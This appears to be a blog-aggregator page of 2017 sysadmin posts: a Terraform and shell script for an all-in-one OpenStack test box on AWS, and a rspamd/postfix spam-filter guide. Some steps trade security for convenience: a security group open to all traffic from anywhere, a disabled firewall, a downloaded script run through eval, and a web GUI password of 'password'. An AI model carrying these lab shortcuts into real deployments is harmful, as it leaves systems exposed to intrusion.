echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

Now try to run a test:

$ source ~/keystonerc_demo
$ cd ~/go/src/github.com/gophercloud/gophercloud
$ go test -v -tags "fixtures acceptance" -run "TestServersCreateDestroy" \
  github.com/gophercloud/gophercloud/acceptance/openstack/compute/v2

That go command is long and tedious. A shortcut would be more helpful. Add the following to ~/.bashrc:

gophercloudtest() {
  if [[ -n $1 ]] && [[ -n $2 ]]; then
    pushd  ~/go/src/github.com/gophercloud/gophercloud
    go test -v -tags "fixtures acceptance" -run "$1" github.com/gophercloud/gophercloud/acceptance/openstack/$2 | tee ~/gophercloud.log
    popd
  fi
}

You can now run tests by doing:

$ source ~/.bashrc
$ gophercloudtest TestServersCreateDestroy compute/v2

Automating the Process

There's been a lot of work done since first logging into the virtual machine and it would be a hassle to have to do it all over again. It would be better if the entire process was automated, from start to finish.

First, create a new directory on your workstation:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir files
$ cd files
$ vi deploy.sh

In the deploy.sh script, add the following contents:

#!/bin/bash

systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network

yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
yum install -y centos-release-openstack-ocata
yum-config-manager --enable openstack-ocata
yum update -y
yum install -y openstack-packstack
packstack --allinone

source /root/keystonerc_admin
nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
_NETWORK_ID=$(openstack network show private -c id -f value)
_SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
_EXTGW_ID=$(openstack network show public -c id -f value)
_IMAGE_ID=$(openstack image show cirros -c id -f value)

echo "" >> /root/keystonerc_admin
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

echo "" >> /root/keystonerc_demo
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

yum install -y wget
wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
chmod +x /usr/local/bin/gimme
eval "$(/usr/local/bin/gimme 1.8)"
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

go get github.com/gophercloud/gophercloud
pushd ~/go/src/github.com/gophercloud/gophercloud
go get -u ./...
popd

cat >> /root/.bashrc <<EOF
if [[ -f /usr/local/bin/gimme ]]; then
  eval "\$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=\$PATH:$GOROOT/bin:\$GOPATH/bin
fi

gophercloudtest() {
  if [[ -n \$1 ]] && [[ -n \$2 ]]; then
    pushd  ~/go/src/github.com/gophercloud/gophercloud
    go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
    popd
  fi
}
EOF

Next, add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

  resource "aws_security_group" "openstack" {
    name        = "openstack"
    description = "Allow all inbound/outbound traffic"

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "tcp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "udp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "icmp"
      cidr_blocks = ["0.0.0.0/0"]
    }

  }

  resource "aws_spot_instance_request" "openstack" {
    ami = "ami-0c2aba6c"
    spot_price = "0.0440"
    instance_type = "m3.xlarge"
    wait_for_fulfillment = true
    spot_type = "one-time"
    key_name = "${aws_key_pair.openstack.key_name}"

    security_groups = ["default", "${aws_security_group.openstack.name}"]

    root_block_device {
      volume_size = 40
      delete_on_termination = true
    }

    tags {
      Name = "OpenStack Test Infra"
    }
  }

+ resource "null_resource" "openstack" {
+  connection {
+    host        = "${aws_spot_instance_request.openstack.public_ip}"
+    user        = "centos"
+    private_key = "${file("key/id_rsa")}"
+  }
+
+  provisioner "file" {
+    source      = "files"
+    destination = "/home/centos/files"
+  }
+
+  provisioner "remote-exec" {
+    inline = [
+      "sudo bash /home/centos/files/deploy.sh"
+    ]
+  }
+ }

  output "ip" {
    value = "${aws_spot_instance_request.openstack.public_ip}"
  }

The above has added a null_resource. null_resource is simply an empty Terraform resource. It's commonly used to store all provisioning steps. In this case, the above null_resource is doing the following:

  1. Configuring the connection to the virtual machine.
  2. Copying the files directory to the virtual machine.
  3. Remotely running the deploy.sh script.

Now when you run Terraform, once the Spot Instance has been created, Terraform will copy the files directory to it and then execute deploy.sh. Terraform will now take approximately 30-40 minutes to finish, but when it has finished, OpenStack will be up and running.

Since a new resource type has been added (null_resource), you will need to run terraform init:

$ pwd
/home/jtopjian/terraform-openstack-test
$ terraform init

Then to run everything from start to finish, do:

$ terraform destroy
$ terraform apply

When Terraform is finished, you will have a fully functional OpenStack environment suitable for testing.

Conclusion

This post detailed how to create an all-in-one OpenStack environment that is suitable for testing applications. Additionally, all configuration was recorded both in Terraform and shell scripts so the environment can be created automatically.

Granted, if you aren't creating a Go-based application, you will need to install other dependencies, but it should be easy to figure out from the example detailed here.

While this setup is a great way to easily build a testing environment, there are still other improvements that can be made. For example, instead of running PackStack each time, an AMI image can be created which already has OpenStack installed. Additionally, multi-node environments can be created for more advanced testing. These methods will be detailed in future posts.

September 30, 2017 06:00 AM

September 27, 2017

Evaggelos Balaskas

Rspamd Fast, free and open-source spam filtering system

Fighting Spam

Fighting email spam in modern times most of the times looks like this:

1ab83c40625d102da1b3001438c0f03b.gif

Rspamd

Rspamd is a rapid spam filtering system. Written in C with Lua script engine extension seems to be really fast and a really good solution for SOHO environments.

In this blog post, I'’ll try to present you a quickstart guide on working with rspamd on a CentOS 6.9 machine running postfix.

DISCLAIMER: This blog post is from a very technical point of view!

Installation

We are going to install rspamd via know rpm repositories:

Epel Repository

We need to install epel repository first:

# yum -y install http://fedora-mirror01.rbc.ru/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm

Rspamd Repository

Now it is time to setup the rspamd repository:

# curl https://rspamd.com/rpm-stable/centos-6/rspamd.repo -o /etc/yum.repos.d/rspamd.repo

Install the gpg key

# rpm --import http://rspamd.com/rpm-stable/gpg.key

and verify the repository with # yum repolist

repo id     repo name
base        CentOS-6 - Base
epel        Extra Packages for Enterprise Linux 6 - x86_64
extras      CentOS-6 - Extras
rspamd      Rspamd stable repository
updates     CentOS-6 - Updates

Rpm

Now it is time to install rspamd to our linux box:

# yum -y install rspamd


# yum info rspamd

Name        : rspamd
Arch        : x86_64
Version     : 1.6.3
Release     : 1
Size        : 8.7 M
Repo        : installed
From repo   : rspamd
Summary     : Rapid spam filtering system
URL         : https://rspamd.com
License     : BSD2c
Description : Rspamd is a rapid, modular and lightweight spam filter. It is designed to work
            : with big amount of mail and can be easily extended with own filters written in
            : lua.

Init File

We need to correct rspamd init file so that rspamd can find the correct configuration file:

# vim /etc/init.d/rspamd

# ebal, Wed, 06 Sep 2017 00:31:37 +0300
## RSPAMD_CONF_FILE="/etc/rspamd/rspamd.sysvinit.conf"
RSPAMD_CONF_FILE="/etc/rspamd/rspamd.conf"

or


# ln -s /etc/rspamd/rspamd.conf /etc/rspamd/rspamd.sysvinit.conf

Start Rspamd

We are now ready to start for the first time rspamd daemon:

# /etc/init.d/rspamd restart

syntax OK
Stopping rspamd:                                           [FAILED]
Starting rspamd:                                           [  OK  ]

verify that is running:

# ps -e fuwww | egrep -i rsp[a]md


root      1337  0.0  0.7 205564  7164 ?        Ss   20:19   0:00 rspamd: main process
_rspamd   1339  0.0  0.7 206004  8068 ?        S    20:19   0:00  _ rspamd: rspamd_proxy process
_rspamd   1340  0.2  1.2 209392 12584 ?        S    20:19   0:00  _ rspamd: controller process
_rspamd   1341  0.0  1.0 208436 11076 ?        S    20:19   0:00  _ rspamd: normal process   

perfect, now it is time to enable rspamd to run on boot:

# chkconfig rspamd on

# chkconfig --list | egrep rspamd
rspamd          0:off   1:off   2:on    3:on    4:on    5:on    6:off

Postfix

In a nutshell, postfix will pass through (filter) an email using the milter protocol to another application before queuing it to one of postfix’s mail queues. Think milter as a bridge that connects two different applications.

rspamd_milter_direct.png

Rspamd Proxy

In Rspamd 1.6 Rmilter is obsoleted but rspamd proxy worker supports milter protocol. That means we need to connect our postfix with rspamd_proxy via milter protocol.

Rspamd has a really nice documentation: https://rspamd.com/doc/index.html
On MTA integration you can find more info.

# netstat -ntlp | egrep -i rspamd

output:

tcp        0      0 0.0.0.0:11332               0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 0.0.0.0:11333               0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 127.0.0.1:11334             0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 :::11332                    :::*                        LISTEN      1451/rspamd
tcp        0      0 :::11333                    :::*                        LISTEN      1451/rspamd
tcp        0      0 ::1:11334                   :::*                        LISTEN      1451/rspamd  

# egrep -A1 proxy /etc/rspamd/rspamd.conf


worker "rspamd_proxy" {
    bind_socket = "*:11332";
    .include "$CONFDIR/worker-proxy.inc"
    .include(try=true; priority=1,duplicate=merge) "$LOCAL_CONFDIR/local.d/worker-proxy.inc"
    .include(try=true; priority=10) "$LOCAL_CONFDIR/override.d/worker-proxy.inc"
}

Milter

If you want to know all the possibly configuration parameter on postfix for milter setup:

# postconf | egrep -i milter

output:

milter_command_timeout = 30s
milter_connect_macros = j {daemon_name} v
milter_connect_timeout = 30s
milter_content_timeout = 300s
milter_data_macros = i
milter_default_action = tempfail
milter_end_of_data_macros = i
milter_end_of_header_macros = i
milter_helo_macros = {tls_version} {cipher} {cipher_bits} {cert_subject} {cert_issuer}
milter_macro_daemon_name = $myhostname
milter_macro_v = $mail_name $mail_version
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr} {mail_host} {mail_mailer}
milter_protocol = 6
milter_rcpt_macros = i {rcpt_addr} {rcpt_host} {rcpt_mailer}
milter_unknown_command_macros =
non_smtpd_milters =
smtpd_milters = 

We are mostly interested in the last two, but it is best to follow rspamd documentation:

# vim /etc/postfix/main.cf

Adding the below configuration lines:

# ebal, Sat, 09 Sep 2017 18:56:02 +0300

## A list of Milter (mail filter) applications for new mail that does not arrive via the Postfix smtpd(8) server.
on_smtpd_milters = inet:127.0.0.1:11332

## A list of Milter (mail filter) applications for new mail that arrives via the Postfix smtpd(8) server.
smtpd_milters = inet:127.0.0.1:11332

## Send macros to mail filter applications
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr} {client_addr} {client_name} {mail_host} {mail_mailer}

## skip mail without checks if something goes wrong, like rspamd is down !
milter_default_action = accept

Reload postfix

# postfix reload

postfix/postfix-script: refreshing the Postfix mail system

Testing

netcat

From a client:

$ nc 192.168.122.96 25

220 centos69.localdomain ESMTP Postfix
EHLO centos69
250-centos69.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM: <root@example.org>
250 2.1.0 Ok
RCPT TO: <root@localhost>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
test
.
250 2.0.0 Ok: queued as 4233520144
^]

Logs

Looking through logs may be a difficult task for many, even so it is a task that you have to do.

MailLog

# egrep 4233520144 /var/log/maillog


Sep  9 19:08:01 localhost postfix/smtpd[1960]: 4233520144: client=unknown[192.168.122.1]
Sep  9 19:08:05 localhost postfix/cleanup[1963]: 4233520144: message-id=<>
Sep  9 19:08:05 localhost postfix/qmgr[1932]: 4233520144: from=<root@example.org>, size=217, nrcpt=1 (queue active)
Sep  9 19:08:05 localhost postfix/local[1964]: 4233520144: to=<root@localhost.localdomain>, orig_to=<root@localhost>, relay=local, delay=12, delays=12/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
Sep  9 19:08:05 localhost postfix/qmgr[1932]: 4233520144: removed

Everything seems fine with postfix.

Rspamd Log

# egrep -i 4233520144 /var/log/rspamd/rspamd.log

2017-09-09 19:08:05 #1455(normal) <79a04e>; task; rspamd_message_parse: loaded message; id: <undef>; queue-id: <4233520144>; size: 6; checksum: <a6a8e3835061e53ed251c57ab4f22463>

2017-09-09 19:08:05 #1455(normal) <79a04e>; task; rspamd_task_write_log: id: <undef>, qid: <4233520144>, ip: 192.168.122.1, from: <root@example.org>, (default: F (add header): [9.40/15.00] [MISSING_MID(2.50){},MISSING_FROM(2.00){},MISSING_SUBJECT(2.00){},MISSING_TO(2.00){},MISSING_DATE(1.00){},MIME_GOOD(-0.10){text/plain;},ARC_NA(0.00){},FROM_NEQ_ENVFROM(0.00){;root@example.org;},RCVD_COUNT_ZERO(0.00){0;},RCVD_TLS_ALL(0.00){}]), len: 6, time: 87.992ms real, 4.723ms virtual, dns req: 0, digest: <a6a8e3835061e53ed251c57ab4f22463>, rcpts: <root@localhost>

It works !

Training

If you have already a spam or junk folder is really easy training the Bayesian classifier with rspamc.

I use Maildir, so for my setup the initial training is something like this:

 # cd /storage/vmails/balaskas.gr/evaggelos/.Spam/cur/ 

# find . -type f -exec rspamc learn_spam {} \;

Auto-Training

I’ve read a lot of tutorials that suggest real-time training via dovecot plugins or something similar. I personally think that approach adds complexity and for small companies or personal setup, I prefer using Cron daemon:


 @daily /bin/find /storage/vmails/balaskas.gr/evaggelos/.Spam/cur/ -type f -mtime -1 -exec rspamc learn_spam {} \;

That means every day, search for new emails in my spam folder and use them to train rspamd.

Training from mbox

First of all seriously ?

Split mbox

There is a nice and simply way to split a mbox to separated files for rspamc to use them.

# awk '/^From / {i++}{print > "msg"i}' Spam

and then feed rspamc:

# ls -1 msg* | xargs rspamc --verbose learn_spam

Stats

# rspamc stat


Results for command: stat (0.068 seconds)
Messages scanned: 2
Messages with action reject: 0, 0.00%
Messages with action soft reject: 0, 0.00%
Messages with action rewrite subject: 0, 0.00%
Messages with action add header: 2, 100.00%
Messages with action greylist: 0, 0.00%
Messages with action no action: 0, 0.00%
Messages treated as spam: 2, 100.00%
Messages treated as ham: 0, 0.00%
Messages learned: 1859
Connections count: 2
Control connections count: 2157
Pools allocated: 2191
Pools freed: 2170
Bytes allocated: 542k
Memory chunks allocated: 41
Shared chunks allocated: 10
Chunks freed: 0
Oversized chunks: 736
Fuzzy hashes in storage "rspamd.com": 659509399
Fuzzy hashes stored: 659509399
Statfile: BAYES_SPAM type: sqlite3; length: 32.66M; free blocks: 0; total blocks: 430.29k; free: 0.00%; learned: 1859; users: 1; languages: 4
Statfile: BAYES_HAM type: sqlite3; length: 9.22k; free blocks: 0; total blocks: 0; free: 0.00%; learned: 0; users: 1; languages: 1
Total learns: 1859

X-Spamd-Result

To view the spam score in every email, we need to enable extended reporting headers and to do that we need to edit our configuration:

# vim /etc/rspamd/modules.d/milter_headers.conf

and just above use add :

    # ebal, Wed, 06 Sep 2017 01:52:08 +0300
    extended_spam_headers = true;

   use = [];

then reload rspamd:

# /etc/init.d/rspamd reload

syntax OK
Reloading rspamd:                                          [  OK  ]

View Source

If your open the email in view-source then you will see something like this:


X-Rspamd-Queue-Id: D0A5728ABF
X-Rspamd-Server: centos69
X-Spamd-Result: default: False [3.40 / 15.00]

Web Server

Rspamd comes with their own web server. That is really useful if you dont have a web server in your mail server, but it is not recommended.

By-default, rspamd web server is only listening to local connections. We can see that from the below ss output

# ss -lp | egrep -i rspamd

LISTEN     0      128                    :::11332                   :::*        users:(("rspamd",7469,10),("rspamd",7471,10),("rspamd",7472,10),("rspamd",7473,10))
LISTEN     0      128                     *:11332                    *:*        users:(("rspamd",7469,9),("rspamd",7471,9),("rspamd",7472,9),("rspamd",7473,9))
LISTEN     0      128                    :::11333                   :::*        users:(("rspamd",7469,18),("rspamd",7473,18))
LISTEN     0      128                     *:11333                    *:*        users:(("rspamd",7469,16),("rspamd",7473,16))
LISTEN     0      128                   ::1:11334                   :::*        users:(("rspamd",7469,14),("rspamd",7472,14),("rspamd",7473,14))
LISTEN     0      128             127.0.0.1:11334                    *:*        users:(("rspamd",7469,12),("rspamd",7472,12),("rspamd",7473,12))

127.0.0.1:11334

So if you want to change that (dont) you have to edit the rspamd.conf (core file):

# vim +/11334 /etc/rspamd/rspamd.conf

and change this line:

bind_socket = "localhost:11334";

to something like this:

bind_socket = "YOUR_SERVER_IP:11334";

or use sed:

# sed -i -e 's/localhost:11334/YOUR_SERVER_IP/' /etc/rspamd/rspamd.conf

and then fire up your browser:

rspamd_worker.png

Web Password

It is a good tactic to change the default password of this web-gui to something else.

# vim /etc/rspamd/worker-controller.inc

  # password = "q1";
  password = "password";

always a good idea to restart rspamd.

Reverse Proxy

I dont like having exposed any web app without SSL or basic authentication, so I shall put rspamd web server under a reverse proxy (apache).

So on httpd-2.2 the configuration is something like this:

ProxyPreserveHost On

<Location /rspamd>
    AuthName "Rspamd Access"
    AuthType Basic
    AuthUserFile /etc/httpd/rspamd_htpasswd
    Require valid-user

    ProxyPass http://127.0.0.1:11334
    ProxyPassReverse http://127.0.0.1:11334 

    Order allow,deny
    Allow from all 

</Location>

Http Basic Authentication

You need to create the file that is going to be used to store usernames and password for basic authentication:

# htpasswd -csb /etc/httpd/rspamd_htpasswd rspamd rspamd_passwd
Adding password for user rspamd

restart your apache instance.

bind_socket

Of course for this to work, we need to change the bind socket on rspamd.conf
Dont forget this ;)

bind_socket = "127.0.0.1:11334";

Selinux

If there is a problem with selinux, then:

# setsebool -P httpd_can_network_connect=1

or

# setsebool httpd_can_network_connect_db on

Errors ?

If you see an error like this:
IO write error

when running rspamd, then you need explicit tell rspamd to use:

rspamc -h 127.0.0.1:11334

To prevent any future errors, I’ve created a shell wrapper:

/usr/local/bin/rspamc

#!/bin/sh
/usr/bin/rspamc -h 127.0.0.1:11334 $*

Final Thoughts

I am using rspamd for a while know and I am pretty happy with it.

I’ve setup a spamtrap email address to feed my spam folder and let the cron script to train rspamd.

So after a thousand emails:

rspamd1k.jpg

September 27, 2017 12:05 AM

September 24, 2017

Raymii.org

Adding IPv6 to a keepalived and haproxy cluster

At work I regularly build high-available clusters for customers, where the setup is distributed over multiple datacenters with failover software. If one component fails, the service doesn't experience issues or downtime due to the failure. Recently I was tasked with expanding a cluster setup to be also reachable via IPv6. This article goes over the settings and configuration required for haproxy and keepalived for IPv6. The internal cluster will only be IPv4, the loadbalancer terminates HTTP and HTTPS connections.

September 24, 2017 12:00 AM

September 23, 2017

Sarah Allen

memories of dragons

In my recent trip to Krakow, I bought a little blue stuffed dragon for my niece. I became curious about the legend of the Krakow dragon and wanted to find a children’s story to listen to and maybe learn a little Polish and found a fun, modern interpretation: Smok.

Two photos: Krakow dragon statue  and child shadow that kind of looks like a dragon

by sarah at September 23, 2017 03:52 PM

Evaggelos Balaskas

Walkaway by Cory Doctorow

Walkaway by Cory Doctorow

Are you willing to walk-away without anything in the world to build a better world ?

walkaway.jpg

Tag(s): books

September 23, 2017 09:36 AM